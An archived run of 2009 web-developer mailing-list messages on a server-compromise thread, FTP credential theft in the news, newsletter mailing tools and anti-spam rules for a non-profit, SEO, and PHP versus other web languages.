<43fee5d00907100855l68c9bc04wa36b1e66cce6b77f@mail.gmail.com> Message-ID: <16f65d000907100906g5151807au199ab6dcc29b2ddd@mail.gmail.com> On Fri, Jul 10, 2009 at 8:55 AM, Shannon Hubbell wrote: > Are you using FTP? > > > http://www.eweek.com/c/a/Security/Trojan-Swipes-FTP-Credentials-for-Major-Companies-in-Malware-Attack-340752/ > Security researchers have uncovered a cache of stolen FTP credentials > belonging to a variety of corporations, including Symantec, McAfee, Amazon > and the Bank of America. I haven't used FTP in years. Why in the world would Bank of America have any FTP servers? (although a key logger could just as easily capture any type of access) -- Bill Moseley moseley at hank.org From heidi at phoenix-designs.com Fri Jul 10 13:45:04 2009 From: heidi at phoenix-designs.com (Heidi Faith) Date: Fri, 10 Jul 2009 11:45:04 -0700 Subject: [thelist] Newsletter Mailer Recommendations Message-ID: <01f901ca018e$8b831d50$a28957f0$@com> I have a client who is a non-profit organization with 15K members. The mailings would be 2-4 times a month. They can't spend a lot $ and I am overwhelmed with all the options out there. They are on a Linux server and I have the option to use phplist but am wondering how secure it would be and ease to setup and use. The client is on a shared server so would need to queue/batch mailings. Any input and/or recommendations would be greatly appreciated. Heidi Faith heidi at phoenix-designs.com From eccentric.one at gmail.com Fri Jul 10 16:35:57 2009 From: eccentric.one at gmail.com (Jeremy Weiss) Date: Fri, 10 Jul 2009 16:35:57 -0500 Subject: [thelist] Newsletter Mailer Recommendations In-Reply-To: <01f901ca018e$8b831d50$a28957f0$@com> References: <01f901ca018e$8b831d50$a28957f0$@com> Message-ID: <4a57b454.1d1d640a.1148.ffffe0c1@mx.google.com> Personally, I've always liked AWeber. And since your client is a non-profit, they'll get 3 months free and a 25% discount. -jeremy From webdad at tampabay.rr.com Fri Jul 10 16:46:54 2009 From: webdad at tampabay.rr.com (Bob Boisvert) Date: Fri, 10 Jul 2009 17:46:54 -0400 Subject: [thelist] Newsletter Mailer Recommendations In-Reply-To: <01f901ca018e$8b831d50$a28957f0$@com> References: <01f901ca018e$8b831d50$a28957f0$@com> Message-ID: <001a01ca01a7$f170d3f0$d4527bd0$@rr.com> >I have a client who is a non-profit organization with 15K members. The mailings would be 2-4 times a month. They can't spend a lot $ and I am overwhelmed with all the options out there. They are on a Linux server and I have the option to use phplist but am wondering how secure it would be and ease to setup and use. The client is on a shared server so would need to queue/batch mailings. Any input and/or recommendations would be greatly appreciated. Heidi Faith < Heidi, I may be thinking way outside the box but instead of thinking about a mailing, why not use Wordpress as your content device for the communication medium and send a onetime mailing out to members with the URL? The URL mailed out would be to a login page to access the blog. Am I oversimplifying? Wordpress is free, only members would be emailed the URL. Just a thought, Bob From jim at nondifferentiable.com Fri Jul 10 18:28:30 2009 From: jim at nondifferentiable.com (Jim Puls) Date: Fri, 10 Jul 2009 16:28:30 -0700 Subject: [thelist] Server hacked? In-Reply-To: <4A573D01.5050507@gmail.com> References: <2A24C94CC008463F91879A05B3FB1E8E@DEV> <4A573D01.5050507@gmail.com> Message-ID: <0E1E4F8D-9B2A-44D8-A5C6-78ADED6C8DC3@nondifferentiable.com> On Jul 10, 2009, at 6:07 AM, Sarah Adams wrote: > Might I ask, since you've done such a bang up job of slamming PHP, > what > programming language you prefer for the web? Not that this question was directed at me, but I could suggest any of the following: - Java (Spring, Struts, JavaServer Faces) - .NET (ASP.NET MVC) - Perl (Catalyst, raw mod_perl) - Python (Django, Pylons, Zope, etc.) - Ruby (Rails, Merb, Sinatra) You can certainly write insecure code in any language, but any of these will give you a nicer development environment than PHP. -> jp From moseley at hank.org Fri Jul 10 19:58:33 2009 From: moseley at hank.org (Bill Moseley) Date: Fri, 10 Jul 2009 17:58:33 -0700 Subject: [thelist] SEO and domain names In-Reply-To: <610592c90906260351g17589bd2wd5ff5c9bacbea3d3@mail.gmail.com> References: <20090624221144.GA26578@hank.org> <59b7ca9f0906250912s4c2c0a4dwd2d327928ee19a7d@mail.gmail.com> <610592c90906260351g17589bd2wd5ff5c9bacbea3d3@mail.gmail.com> Message-ID: <16f65d000907101758y5b137055j15be90e58b59742e@mail.gmail.com> Some additional input: http://www.seomoz.org/blog/understanding-root-domains-subdomains-vs-subfolders-microsites Would I call that authoritative? I don't know. Is anyone authoritative on SEO other than the programmers at Google and other search engines? -- Bill Moseley moseley at hank.org From Ken at adOpenStatic.com Fri Jul 10 23:45:43 2009 From: Ken at adOpenStatic.com (Ken Schaefer) Date: Sat, 11 Jul 2009 14:45:43 +1000 Subject: [thelist] Server hacked? In-Reply-To: <16f65d000907100906g5151807au199ab6dcc29b2ddd@mail.gmail.com> References: <2A24C94CC008463F91879A05B3FB1E8E@DEV> <43fee5d00907100855l68c9bc04wa36b1e66cce6b77f@mail.gmail.com>, <16f65d000907100906g5151807au199ab6dcc29b2ddd@mail.gmail.com> Message-ID: I work for a bank. Lots of banks (and companies that use them) use file transfer systems (including FTP) to send files around. However these are generally not on public networks. Cheers Ken ________________________________________ From: thelist-bounces at lists.evolt.org [thelist-bounces at lists.evolt.org] On Behalf Of Bill Moseley [moseley at hank.org] Sent: Saturday, 11 July 2009 2:06 AM To: thelist at lists.evolt.org Subject: Re: [thelist] Server hacked? On Fri, Jul 10, 2009 at 8:55 AM, Shannon Hubbell wrote: > Are you using FTP? > > > http://www.eweek.com/c/a/Security/Trojan-Swipes-FTP-Credentials-for-Major-Companies-in-Malware-Attack-340752/ > Security researchers have uncovered a cache of stolen FTP credentials > belonging to a variety of corporations, including Symantec, McAfee, Amazon > and the Bank of America. I haven't used FTP in years. Why in the world would Bank of America have any FTP servers? (although a key logger could just as easily capture any type of access) From nan at nanharbison.com Sat Jul 11 05:21:42 2009 From: nan at nanharbison.com (Nan Harbison) Date: Sat, 11 Jul 2009 06:21:42 -0400 Subject: [thelist] Newsletter Mailer Recommendations In-Reply-To: <001a01ca01a7$f170d3f0$d4527bd0$@rr.com> References: <01f901ca018e$8b831d50$a28957f0$@com> <001a01ca01a7$f170d3f0$d4527bd0$@rr.com> Message-ID: <37787B39298740FCBA473A8E958E6D0A@nancyb0bda4ba6> Heidi, Legally, you have to have an opt out/unsubscribe at the bottom of all marketing emails, so if Wordpress offers that, it would be an option. Otherwise, I just finished doing a website for a non-profit, they use vertical response, who claim they do non profits for free, although then they say you get to send 10 K emails a month. The link from their last email: http://www.verticalresponse.com/landing/non-profits/?np/21ecb35ccd I have no idea how expensive it is for the rest of the emails. Nan -----Original Message----- From: thelist-bounces at lists.evolt.org [mailto:thelist-bounces at lists.evolt.org] On Behalf Of Bob Boisvert Sent: Friday, July 10, 2009 5:47 PM To: thelist at lists.evolt.org Subject: Re: [thelist] Newsletter Mailer Recommendations >I have a client who is a non-profit organization with 15K members. The mailings would be 2-4 times a month. They can't spend a lot $ and I am overwhelmed with all the options out there. They are on a Linux server and I have the option to use phplist but am wondering how secure it would be and ease to setup and use. The client is on a shared server so would need to queue/batch mailings. Any input and/or recommendations would be greatly appreciated. Heidi Faith < Heidi, I may be thinking way outside the box but instead of thinking about a mailing, why not use Wordpress as your content device for the communication medium and send a onetime mailing out to members with the URL? The URL mailed out would be to a login page to access the blog. Am I oversimplifying? Wordpress is free, only members would be emailed the URL. Just a thought, Bob -- * * Please support the community that supports you. * * http://evolt.org/help_support_evolt/ For unsubscribe and other options, including the Tip Harvester and archives of thelist go to: http://lists.evolt.org Workers of the Web, evolt ! From JGERSTEN at lchb.com Sat Jul 11 10:27:15 2009 From: JGERSTEN at lchb.com (Gersten, John) Date: Sat, 11 Jul 2009 08:27:15 -0700 Subject: [thelist] Newsletter Mailer Recommendations References: <01f901ca018e$8b831d50$a28957f0$@com><001a01ca01a7$f170d3f0$d4527bd0$@rr.com> <37787B39298740FCBA473A8E958E6D0A@nancyb0bda4ba6> Message-ID: <3CBA52B9335F054FB6D2E68618E018C60762AE75@sfmail01.lchb.com> I believe under US CAN-SPAM (don't recall if you mentioned a particular country for your recipient pool) you also must provide a snail-mail address on all marketing communications, although that may vary a bit when you're sending to an opt-in subscriber list. (And of course different countries probably have different-but-similar laws in place). But it's definitely worth checking; one of the reason we began outsourcing all our large (30k and greater) mailings was because small omissions on that sort of thing can lead to large email providers like hotmail or gmail etc. blacklisting your communications. And it's a pain in the neck to get them to un-blacklist you. -----Original Message----- From: thelist-bounces at lists.evolt.org on behalf of Nan Harbison Sent: Sat 7/11/09 3:21 To: thelist at lists.evolt.org Subject: Re: [thelist] Newsletter Mailer Recommendations Heidi, Legally, you have to have an opt out/unsubscribe at the bottom of all marketing emails, so if Wordpress offers that, it would be an option. Otherwise, I just finished doing a website for a non-profit, they use vertical response, who claim they do non profits for free, although then they say you get to send 10 K emails a month. The link from their last email: http://www.verticalresponse.com/landing/non-profits/?np/21ecb35ccd I have no idea how expensive it is for the rest of the emails. Nan -----Original Message----- From: thelist-bounces at lists.evolt.org [mailto:thelist-bounces at lists.evolt.org] On Behalf Of Bob Boisvert Sent: Friday, July 10, 2009 5:47 PM To: thelist at lists.evolt.org Subject: Re: [thelist] Newsletter Mailer Recommendations >I have a client who is a non-profit organization with 15K members. The mailings would be 2-4 times a month. They can't spend a lot $ and I am overwhelmed with all the options out there. They are on a Linux server and I have the option to use phplist but am wondering how secure it would be and ease to setup and use. The client is on a shared server so would need to queue/batch mailings. Any input and/or recommendations would be greatly appreciated. Heidi Faith < Heidi, I may be thinking way outside the box but instead of thinking about a mailing, why not use Wordpress as your content device for the communication medium and send a onetime mailing out to members with the URL? The URL mailed out would be to a login page to access the blog. Am I oversimplifying? Wordpress is free, only members would be emailed the URL. Just a thought, Bob -- * * Please support the community that supports you. * * http://evolt.org/help_support_evolt/ For unsubscribe and other options, including the Tip Harvester and archives of thelist go to: http://lists.evolt.org Workers of the Web, evolt ! -- * * Please support the community that supports you. * * http://evolt.org/help_support_evolt/ For unsubscribe and other options, including the Tip Harvester and archives of thelist go to: http://lists.evolt.org Workers of the Web, evolt ! From martin at easyweb.co.uk Sun Jul 12 02:47:14 2009 From: martin at easyweb.co.uk (Martin Burns) Date: Sun, 12 Jul 2009 08:47:14 +0100 Subject: [thelist] Newsletter Mailer Recommendations In-Reply-To: <01f901ca018e$8b831d50$a28957f0$@com> References: <01f901ca018e$8b831d50$a28957f0$@com> Message-ID: <679E85F2-69C8-4A96-B5AB-CB2C8D39C98F@easyweb.co.uk> On 10 Jul 2009, at 19:45, Heidi Faith wrote: > I have a client who is a non-profit organization with 15K members. The > mailings would be 2-4 times a month. They can't spend a lot $ and I am > overwhelmed with all the options out there. They are on a Linux > server and I > have the option to use phplist but am wondering how secure it would > be and > ease to setup and use. The client is on a shared server so would > need to > queue/batch mailings. > Any input and/or recommendations would be greatly appreciated. SugarCRM will do this, and will provide a lot of other useful membership/donor management stuff into the bargain. Is response tracking important? Personalisation? However, with all solutions that do more than effectively send one mail with a big bcc list (and believe me, individually addressed mails are a *much* better idea), you'll need to check that the PHP memory allocation is enough. Cheers Martin -- > Spammers: Send me email -> yumyum at easyweb.co.uk to train my filter > http://dspam.nuclearelephant.com/ From viggie at viggie.com Sun Jul 12 22:24:39 2009 From: viggie at viggie.com (Viggie) Date: Mon, 13 Jul 2009 08:54:39 +0530 Subject: [thelist] Server hacked? In-Reply-To: <0E1E4F8D-9B2A-44D8-A5C6-78ADED6C8DC3@nondifferentiable.com> References: <2A24C94CC008463F91879A05B3FB1E8E@DEV> <4A573D01.5050507@gmail.com> <0E1E4F8D-9B2A-44D8-A5C6-78ADED6C8DC3@nondifferentiable.com> Message-ID: <1247455479.6949.7.camel@dell> I'm intrigued. How come the leading & greatly revered open source apps, like wordpress, drupal & joomla use only php instead of any of those nicer development environments. Why the nicer development environments cannot produce better applications than these even though some of then were around far longer than php. I'm ready to switch if there were any convincing proof rather than mere statements like these. cheers, Viggie --------------------------------------- http://www.viggie.com Helping websites to work On Fri, 2009-07-10 at 16:28 -0700, Jim Puls wrote: > On Jul 10, 2009, at 6:07 AM, Sarah Adams wrote: > > > Might I ask, since you've done such a bang up job of slamming PHP, > > what > > programming language you prefer for the web? > > Not that this question was directed at me, but I could suggest any of > the following: > > - Java (Spring, Struts, JavaServer Faces) > - .NET (ASP.NET MVC) > - Perl (Catalyst, raw mod_perl) > - Python (Django, Pylons, Zope, etc.) > - Ruby (Rails, Merb, Sinatra) > > You can certainly write insecure code in any language, but any of > these will give you a nicer development environment than PHP. > > -> jp > --Apple-Mail-3-525854446-- >